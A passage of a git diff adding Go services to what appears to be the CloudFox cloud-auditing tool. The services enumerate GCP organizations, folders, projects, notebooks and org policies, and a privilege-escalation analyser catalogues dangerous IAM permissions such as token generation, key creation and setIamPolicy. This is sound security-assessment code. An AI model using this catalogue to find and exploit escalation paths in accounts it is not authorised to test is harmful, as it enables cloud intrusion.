([]RuntimeInfo, error) { + ctx := context.Background() + var service *notebooks.Service + var err error + + if s.session != nil { + service, err = notebooks.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = notebooks.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "notebooks.googleapis.com") + } + + var 
runtimes []RuntimeInfo + + // List across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + req := service.Projects.Locations.Runtimes.List(parent) + err = req.Pages(ctx, func(page *notebooks.ListRuntimesResponse) error { + for _, runtime := range page.Runtimes { + info := s.parseRuntime(runtime, projectID) + runtimes = append(runtimes, info) + } + return nil + }) + if err != nil { + // Runtimes API might not be available in all regions + return runtimes, nil + } + + return runtimes, nil +} + +func (s *NotebooksService) parseInstance(instance *notebooks.Instance, projectID string) NotebookInstanceInfo { + info := NotebookInstanceInfo{ + Name: extractName(instance.Name), + ProjectID: projectID, + Location: extractLocation(instance.Name), + State: instance.State, + MachineType: extractName(instance.MachineType), + CreateTime: instance.CreateTime, + UpdateTime: instance.UpdateTime, + } + + // Service account + info.ServiceAccount = instance.ServiceAccount + + // Network config + info.Network = extractName(instance.Network) + info.Subnet = extractName(instance.Subnet) + info.NoPublicIP = instance.NoPublicIp + info.NoProxyAccess = instance.NoProxyAccess + + // Proxy URI and Creator + info.ProxyUri = instance.ProxyUri + info.Creator = instance.Creator + + // Boot disk + info.BootDiskType = instance.BootDiskType + info.BootDiskSizeGB = instance.BootDiskSizeGb + + // Data disk + info.DataDiskType = instance.DataDiskType + info.DataDiskSizeGB = instance.DataDiskSizeGb + + // GPU config + if instance.AcceleratorConfig != nil { + info.AcceleratorType = instance.AcceleratorConfig.Type + info.AcceleratorCount = instance.AcceleratorConfig.CoreCount + } + info.InstallGpuDriver = instance.InstallGpuDriver + + // Custom container + if instance.ContainerImage != nil { + info.CustomContainer = true + } + + return info +} + +func (s *NotebooksService) parseRuntime(runtime *notebooks.Runtime, projectID string) RuntimeInfo { + info := RuntimeInfo{ + Name: 
extractName(runtime.Name), + ProjectID: projectID, + Location: extractLocation(runtime.Name), + State: runtime.State, + } + + if runtime.VirtualMachine != nil { + info.RuntimeType = "VirtualMachine" + if runtime.VirtualMachine.VirtualMachineConfig != nil { + config := runtime.VirtualMachine.VirtualMachineConfig + info.MachineType = config.MachineType + info.Network = extractName(config.Network) + info.Subnet = extractName(config.Subnet) + } + } + + if runtime.AccessConfig != nil { + info.ServiceAccount = runtime.AccessConfig.RuntimeOwner + } + + return info +} + +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +func extractLocation(fullName string) string { + parts := strings.Split(fullName, "/") + for i, part := range parts { + if part == "locations" && i+1 < len(parts) { + return parts[i+1] + } + } + return "" +} diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go new file mode 100644 index 00000000..ae4c2654 --- /dev/null +++ b/gcp/services/organizationsService/organizationsService.go @@ -0,0 +1,470 @@ +package organizationsservice + +import ( + "context" + "fmt" + "strings" + + resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/iterator" +) + +type OrganizationsService struct { + session *gcpinternal.SafeSession +} + +// New creates a new OrganizationsService +func New() *OrganizationsService { + return &OrganizationsService{} +} + +// NewWithSession creates an OrganizationsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *OrganizationsService { + return &OrganizationsService{session: session} +} + +// OrganizationInfo represents organization 
details +type OrganizationInfo struct { + Name string `json:"name"` // organizations/ORGANIZATION_ID + DisplayName string `json:"displayName"` + DirectoryID string `json:"directoryId"` // Cloud Identity directory ID + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// FolderInfo represents folder details +type FolderInfo struct { + Name string `json:"name"` // folders/FOLDER_ID + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// ProjectInfo represents project details +type ProjectInfo struct { + Name string `json:"name"` // projects/PROJECT_ID + ProjectID string `json:"projectId"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` // organizations/X or folders/X + State string `json:"state"` // ACTIVE, DELETE_REQUESTED + Labels map[string]string `json:"labels"` + CreateTime string `json:"createTime"` + UpdateTime string `json:"updateTime"` + DeleteTime string `json:"deleteTime"` +} + +// HierarchyNode represents a node in the resource hierarchy +type HierarchyNode struct { + Type string `json:"type"` // organization, folder, project + ID string `json:"id"` + DisplayName string `json:"displayName"` + Parent string `json:"parent"` + Children []HierarchyNode `json:"children"` + Depth int `json:"depth"` +} + +// SearchOrganizations searches for organizations accessible to the caller +func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) { + ctx := context.Background() + var client *resourcemanager.OrganizationsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } 
else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var orgs []OrganizationInfo + + req := &resourcemanagerpb.SearchOrganizationsRequest{} + it := client.SearchOrganizations(ctx, req) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + orgInfo := OrganizationInfo{ + Name: org.Name, + DisplayName: org.DisplayName, + State: org.State.String(), + } + if org.CreateTime != nil { + orgInfo.CreateTime = org.CreateTime.AsTime().String() + } + if org.UpdateTime != nil { + orgInfo.UpdateTime = org.UpdateTime.AsTime().String() + } + if org.DeleteTime != nil { + orgInfo.DeleteTime = org.DeleteTime.AsTime().String() + } + + orgs = append(orgs, orgInfo) + } + + return orgs, nil +} + +// SearchFolders searches for folders under a given parent +func (s *OrganizationsService) SearchFolders(parent string) ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + // Search for folders under the given parent + query := fmt.Sprintf("parent=%s", parent) + req := &resourcemanagerpb.SearchFoldersRequest{ + Query: query, + } + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, 
+ Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchAllFolders searches for all accessible folders +func (s *OrganizationsService) SearchAllFolders() ([]FolderInfo, error) { + ctx := context.Background() + var client *resourcemanager.FoldersClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var folders []FolderInfo + + req := &resourcemanagerpb.SearchFoldersRequest{} + it := client.SearchFolders(ctx, req) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + folderInfo := FolderInfo{ + Name: folder.Name, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + State: folder.State.String(), + } + if folder.CreateTime != nil { + folderInfo.CreateTime = folder.CreateTime.AsTime().String() + } + if folder.UpdateTime != nil { + folderInfo.UpdateTime = folder.UpdateTime.AsTime().String() + } + if folder.DeleteTime != nil { + folderInfo.DeleteTime = folder.DeleteTime.AsTime().String() + } + + folders = append(folders, folderInfo) + } + + return folders, nil +} + +// SearchProjects searches for projects +func (s *OrganizationsService) SearchProjects(parent string) ([]ProjectInfo, error) { + ctx := context.Background() + var client *resourcemanager.ProjectsClient + var err error + + 
if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer client.Close() + + var projects []ProjectInfo + + query := "" + if parent != "" { + query = fmt.Sprintf("parent=%s", parent) + } + req := &resourcemanagerpb.SearchProjectsRequest{ + Query: query, + } + it := client.SearchProjects(ctx, req) + for { + project, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + projectInfo := ProjectInfo{ + Name: project.Name, + ProjectID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + State: project.State.String(), + Labels: project.Labels, + } + if project.CreateTime != nil { + projectInfo.CreateTime = project.CreateTime.AsTime().String() + } + if project.UpdateTime != nil { + projectInfo.UpdateTime = project.UpdateTime.AsTime().String() + } + if project.DeleteTime != nil { + projectInfo.DeleteTime = project.DeleteTime.AsTime().String() + } + + projects = append(projects, projectInfo) + } + + return projects, nil +} + +// GetProjectAncestry returns the ancestry path from project to organization +func (s *OrganizationsService) GetProjectAncestry(projectID string) ([]HierarchyNode, error) { + ctx := context.Background() + + var projectsClient *resourcemanager.ProjectsClient + var foldersClient *resourcemanager.FoldersClient + var err error + + if s.session != nil { + projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + projectsClient, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer projectsClient.Close() + + if s.session != nil { + 
foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + var ancestry []HierarchyNode + resourceID := "projects/" + projectID + + for { + if strings.HasPrefix(resourceID, "organizations/") { + orgID := strings.TrimPrefix(resourceID, "organizations/") + ancestry = append(ancestry, HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: resourceID, + }) + break + } else if strings.HasPrefix(resourceID, "folders/") { + folder, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) + if err != nil { + break + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + ancestry = append(ancestry, HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + }) + resourceID = folder.Parent + } else if strings.HasPrefix(resourceID, "projects/") { + project, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) + if err != nil { + break + } + ancestry = append(ancestry, HierarchyNode{ + Type: "project", + ID: project.ProjectId, + DisplayName: project.DisplayName, + Parent: project.Parent, + }) + resourceID = project.Parent + } else { + break + } + } + + // Reverse to go from organization to project + for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { + ancestry[i], ancestry[j] = ancestry[j], ancestry[i] + } + + // Set depth + for i := range ancestry { + ancestry[i].Depth = i + } + + return ancestry, nil +} + +// GetOrganizationIDFromProject returns the organization ID for a given project +// by walking up the resource hierarchy until it finds an organization +func (s *OrganizationsService) GetOrganizationIDFromProject(projectID string) (string, error) { + ancestry, err := 
s.GetProjectAncestry(projectID) + if err != nil { + return "", err + } + + for _, node := range ancestry { + if node.Type == "organization" { + return node.ID, nil + } + } + + return "", fmt.Errorf("no organization found in ancestry for project %s", projectID) +} + +// BuildHierarchy builds a complete hierarchy tree +func (s *OrganizationsService) BuildHierarchy() ([]HierarchyNode, error) { + // Get organizations + orgs, err := s.SearchOrganizations() + if err != nil { + return nil, err + } + + var roots []HierarchyNode + + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNode := HierarchyNode{ + Type: "organization", + ID: orgID, + DisplayName: org.DisplayName, + Depth: 0, + Children: []HierarchyNode{}, + } + + // Get folders under this org + s.buildFolderTree(&orgNode, org.Name, 1) + + // Get projects directly under org + projects, err := s.SearchProjects(org.Name) + if err == nil { + for _, proj := range projects { + projNode := HierarchyNode{ + Type: "project", + ID: proj.ProjectID, + DisplayName: proj.DisplayName, + Parent: proj.Parent, + Depth: 1, + } + orgNode.Children = append(orgNode.Children, projNode) + } + } + + roots = append(roots, orgNode) + } + + return roots, nil +} + +// buildFolderTree recursively builds folder tree +func (s *OrganizationsService) buildFolderTree(parent *HierarchyNode, parentName string, depth int) { + folders, err := s.SearchFolders(parentName) + if err != nil { + return + } + + for _, folder := range folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNode := HierarchyNode{ + Type: "folder", + ID: folderID, + DisplayName: folder.DisplayName, + Parent: folder.Parent, + Depth: depth, + Children: []HierarchyNode{}, + } + + // Recursively get child folders + s.buildFolderTree(&folderNode, folder.Name, depth+1) + + // Get projects under this folder + projects, err := s.SearchProjects(folder.Name) + if err == nil { + for _, proj := range projects { + projNode := 
HierarchyNode{
					Type:        "project",
					ID:          proj.ProjectID,
					DisplayName: proj.DisplayName,
					Parent:      proj.Parent,
					Depth:       depth + 1,
				}
				folderNode.Children = append(folderNode.Children, projNode)
			}
		}

		parent.Children = append(parent.Children, folderNode)
	}
}
diff --git a/gcp/services/orgpolicyService/orgpolicyService.go b/gcp/services/orgpolicyService/orgpolicyService.go
new file mode 100644
index 00000000..0eb96d7b
--- /dev/null
+++ b/gcp/services/orgpolicyService/orgpolicyService.go
@@ -0,0 +1,223 @@
package orgpolicyservice

import (
	"context"
	"fmt"
	"strings"

	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
	"google.golang.org/api/orgpolicy/v2"
)

// OrgPolicyService lists organization policies through the Org Policy v2 API.
type OrgPolicyService struct {
	// session, when non-nil, supplies managed credentials via GetClientOption;
	// when nil the service falls back to application-default credentials.
	session *gcpinternal.SafeSession
}

// New returns an OrgPolicyService using application-default credentials.
func New() *OrgPolicyService {
	return &OrgPolicyService{}
}

// NewWithSession returns an OrgPolicyService bound to the given SafeSession
// for managed authentication.
func NewWithSession(session *gcpinternal.SafeSession) *OrgPolicyService {
	return &OrgPolicyService{session: session}
}

// OrgPolicyInfo represents an organization policy
type OrgPolicyInfo struct {
	Name          string   `json:"name"`              // full policy resource name
	Constraint    string   `json:"constraint"`        // canonical "constraints/..." ID derived from Name
	ProjectID     string   `json:"projectId"`
	Enforced      bool     `json:"enforced"`
	AllowAll      bool     `json:"allowAll"`
	DenyAll       bool     `json:"denyAll"`
	AllowedValues []string `json:"allowedValues"`
	DeniedValues  []string `json:"deniedValues"`
	InheritParent bool     `json:"inheritFromParent"`
	Description   string   `json:"description"`       // filled from SecurityRelevantConstraints when known
}

// SecurityRelevantConstraints maps constraint names to their security implications
var SecurityRelevantConstraints = map[string]struct {
	Description   string
	RiskWhenWeak  string
	DefaultSecure bool
}{
	// Domain restriction
	"constraints/iam.allowedPolicyMemberDomains": {
		Description:   "Restricts IAM members to specific domains",
		RiskWhenWeak:  "Allows external users/accounts to be granted IAM permissions",
		DefaultSecure: false,
	},
	// Service account key creation
	"constraints/iam.disableServiceAccountKeyCreation": {
		Description: "Prevents
service account key creation", + RiskWhenWeak: "Allows persistent SA key creation for long-term access", + DefaultSecure: false, + }, + "constraints/iam.disableServiceAccountKeyUpload": { + Description: "Prevents uploading service account keys", + RiskWhenWeak: "Allows external keys to be uploaded for SA access", + DefaultSecure: false, + }, + // Workload identity + "constraints/iam.workloadIdentityPoolProviders": { + Description: "Restricts workload identity pool providers", + RiskWhenWeak: "Allows external identity providers to assume GCP identities", + DefaultSecure: false, + }, + "constraints/iam.workloadIdentityPoolAwsAccounts": { + Description: "Restricts AWS accounts for workload identity", + RiskWhenWeak: "Allows any AWS account to assume GCP identity", + DefaultSecure: false, + }, + // Compute restrictions + "constraints/compute.requireShieldedVm": { + Description: "Requires Shielded VMs", + RiskWhenWeak: "Allows VMs without Shielded VM protections", + DefaultSecure: false, + }, + "constraints/compute.requireOsLogin": { + Description: "Requires OS Login for SSH access", + RiskWhenWeak: "Allows metadata-based SSH keys instead of centralized access", + DefaultSecure: false, + }, + "constraints/compute.vmExternalIpAccess": { + Description: "Restricts which VMs can have external IPs", + RiskWhenWeak: "Allows any VM to have an external IP", + DefaultSecure: false, + }, + "constraints/compute.disableSerialPortAccess": { + Description: "Disables serial port access to VMs", + RiskWhenWeak: "Allows serial console access to VMs", + DefaultSecure: false, + }, + "constraints/compute.disableNestedVirtualization": { + Description: "Disables nested virtualization", + RiskWhenWeak: "Allows nested VMs for potential sandbox escape", + DefaultSecure: false, + }, + // Storage restrictions + "constraints/storage.uniformBucketLevelAccess": { + Description: "Requires uniform bucket-level access", + RiskWhenWeak: "Allows ACL-based access which is harder to audit", + 
DefaultSecure: false, + }, + "constraints/storage.publicAccessPrevention": { + Description: "Prevents public access to storage buckets", + RiskWhenWeak: "Allows public bucket/object access", + DefaultSecure: false, + }, + // SQL restrictions + "constraints/sql.restrictPublicIp": { + Description: "Restricts public IPs on Cloud SQL", + RiskWhenWeak: "Allows Cloud SQL instances with public IPs", + DefaultSecure: false, + }, + "constraints/sql.restrictAuthorizedNetworks": { + Description: "Restricts authorized networks for Cloud SQL", + RiskWhenWeak: "Allows broad network access to Cloud SQL", + DefaultSecure: false, + }, + // GKE restrictions + "constraints/container.restrictPublicEndpoint": { + Description: "Restricts GKE public endpoints", + RiskWhenWeak: "Allows GKE clusters with public API endpoints", + DefaultSecure: false, + }, + // Resource location + "constraints/gcp.resourceLocations": { + Description: "Restricts resource locations/regions", + RiskWhenWeak: "Allows resources in any region (compliance risk)", + DefaultSecure: false, + }, + // Service usage + "constraints/serviceuser.services": { + Description: "Restricts which services can be enabled", + RiskWhenWeak: "Allows any GCP service to be enabled", + DefaultSecure: false, + }, + // VPC + "constraints/compute.restrictSharedVpcSubnetworks": { + Description: "Restricts Shared VPC subnetworks", + RiskWhenWeak: "Allows access to any Shared VPC subnetwork", + DefaultSecure: false, + }, + "constraints/compute.restrictVpnPeerIPs": { + Description: "Restricts VPN peer IPs", + RiskWhenWeak: "Allows VPN tunnels to any peer", + DefaultSecure: false, + }, +} + +// ListProjectPolicies lists all org policies for a project +func (s *OrgPolicyService) ListProjectPolicies(projectID string) ([]OrgPolicyInfo, error) { + ctx := context.Background() + var service *orgpolicy.Service + var err error + + if s.session != nil { + service, err = orgpolicy.NewService(ctx, s.session.GetClientOption()) + } else { + service, err = 
orgpolicy.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + var policies []OrgPolicyInfo + parent := fmt.Sprintf("projects/%s", projectID) + + err = service.Projects.Policies.List(parent).Pages(ctx, func(resp *orgpolicy.GoogleCloudOrgpolicyV2ListPoliciesResponse) error { + for _, policy := range resp.Policies { + info := s.parsePolicyInfo(policy, projectID) + policies = append(policies, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "orgpolicy.googleapis.com") + } + + return policies, nil +} + +func (s *OrgPolicyService) parsePolicyInfo(policy *orgpolicy.GoogleCloudOrgpolicyV2Policy, projectID string) OrgPolicyInfo { + info := OrgPolicyInfo{ + Name: policy.Name, + ProjectID: projectID, + } + + // Extract constraint name from policy name + parts := strings.Split(policy.Name, "/policies/") + if len(parts) > 1 { + info.Constraint = "constraints/" + parts[1] + } + + // Get description from SecurityRelevantConstraints if available + if secInfo, ok := SecurityRelevantConstraints[info.Constraint]; ok { + info.Description = secInfo.Description + } + + // Parse the spec + if policy.Spec != nil { + info.InheritParent = policy.Spec.InheritFromParent + + for _, rule := range policy.Spec.Rules { + if rule == nil { + continue + } + + // In v2 API, these are booleans + info.Enforced = rule.Enforce + info.AllowAll = rule.AllowAll + info.DenyAll = rule.DenyAll + + if rule.Values != nil { + info.AllowedValues = append(info.AllowedValues, rule.Values.AllowedValues...) + info.DeniedValues = append(info.DeniedValues, rule.Values.DeniedValues...) 
+ } + } + } + + return info +} + diff --git a/gcp/services/privescService/privescService.go b/gcp/services/privescService/privescService.go new file mode 100644 index 00000000..fe9c070d --- /dev/null +++ b/gcp/services/privescService/privescService.go @@ -0,0 +1,442 @@ +package privescservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "google.golang.org/api/cloudresourcemanager/v1" + "google.golang.org/api/iam/v1" +) + +type PrivescService struct { + session *gcpinternal.SafeSession +} + +func New() *PrivescService { + return &PrivescService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *PrivescService { + return &PrivescService{session: session} +} + +// PrivescPath represents a privilege escalation opportunity +type PrivescPath struct { + Principal string `json:"principal"` // Who has this capability + PrincipalType string `json:"principalType"` // user, serviceAccount, group + Method string `json:"method"` // The privesc method name + TargetResource string `json:"targetResource"` // What resource they can escalate on + Permissions []string `json:"permissions"` // Permissions enabling this + RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM + Description string `json:"description"` // Explanation + ExploitCommand string `json:"exploitCommand"` // Command to exploit + ProjectID string `json:"projectId"` +} + +// DangerousPermission represents a permission that enables privilege escalation +type DangerousPermission struct { + Permission string `json:"permission"` + Category string `json:"category"` // SA Impersonation, Key Creation, IAM Modification, etc. 
+ RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM + Description string `json:"description"` // What this enables +} + +// GetDangerousPermissions returns the list of known dangerous GCP permissions +func GetDangerousPermissions() []DangerousPermission { + return []DangerousPermission{ + // Service Account Impersonation - CRITICAL + {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA"}, + {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA (GCS signed URLs)"}, + {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA (impersonation)"}, + {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Delegate SA identity to others"}, + + // Key Creation - CRITICAL + {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys"}, + {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, + + // IAM Modification - CRITICAL + {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, + {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, + {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, + {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Grant access to service accounts"}, + {Permission: "iam.roles.update", Category: "IAM 
Modification", RiskLevel: "HIGH", Description: "Modify custom role permissions"}, + {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, + + // Compute Access - HIGH + {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, + {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, + {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, + {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, + {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, + + // Cloud Functions - HIGH + {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, + {Permission: "cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, + {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, + + // Cloud Run - HIGH + {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, + {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, + + // Cloud Build - HIGH + {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "HIGH", Description: "Run builds with Cloud Build SA"}, + {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configurations"}, + + // GKE - HIGH + {Permission: 
"container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, + {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, + {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, + + // Storage - MEDIUM + {Permission: "storage.buckets.setIamPolicy", Category: "Storage", RiskLevel: "MEDIUM", Description: "Modify bucket access"}, + {Permission: "storage.objects.create", Category: "Storage", RiskLevel: "MEDIUM", Description: "Upload objects to buckets"}, + + // Secrets - HIGH + {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, + + // Org Policies - HIGH + {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "HIGH", Description: "Modify organization policies"}, + + // Deployment Manager - HIGH + {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "HIGH", Description: "Deploy resources with DM SA"}, + + // API Keys - MEDIUM + {Permission: "serviceusage.apiKeys.create", Category: "API Keys", RiskLevel: "MEDIUM", Description: "Create API keys"}, + + // Actor permissions + {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, + } +} + +// AnalyzeProjectPrivesc analyzes a project for privilege escalation paths +func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, error) { + ctx := context.Background() + + // Get project IAM policy + var crmService *cloudresourcemanager.Service + var err error + + if s.session != nil { + crmService, err = cloudresourcemanager.NewService(ctx, s.session.GetClientOption()) + } else { + crmService, err = 
cloudresourcemanager.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &cloudresourcemanager.GetIamPolicyRequest{}).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + var paths []PrivescPath + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + // Continue without role resolution + iamService = nil + } + + // Analyze each binding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + // Get permissions for this role + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + + // Check each member for dangerous permissions + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForPrivesc(member, binding.Role, permissions, projectID) + paths = append(paths, memberPaths...) 
+ } + } + + return paths, nil +} + +// getRolePermissions resolves a role to its permissions +func (s *PrivescService) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + ctx := context.Background() + + // Handle different role types + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + // Predefined role + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + // Project custom role + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + // Org custom role + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + // Assume predefined role format + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + // Try to query testable permissions as fallback + return s.getTestablePermissions(ctx, iamService, role, projectID) + } + + return roleInfo.IncludedPermissions +} + +// getTestablePermissions uses QueryTestablePermissions for complex cases +func (s *PrivescService) getTestablePermissions(ctx context.Context, iamService *iam.Service, role string, projectID string) []string { + // This is a simplified version - in production you'd want more robust handling + // For now, return known permissions for common roles + knownRoles := map[string][]string{ + "roles/owner": { + "iam.serviceAccounts.getAccessToken", + "iam.serviceAccountKeys.create", + "resourcemanager.projects.setIamPolicy", + "compute.instances.setMetadata", + }, + "roles/editor": { + "compute.instances.setMetadata", + "cloudfunctions.functions.create", + "run.services.create", + }, + "roles/iam.serviceAccountAdmin": { + "iam.serviceAccountKeys.create", + "iam.serviceAccounts.setIamPolicy", + }, + 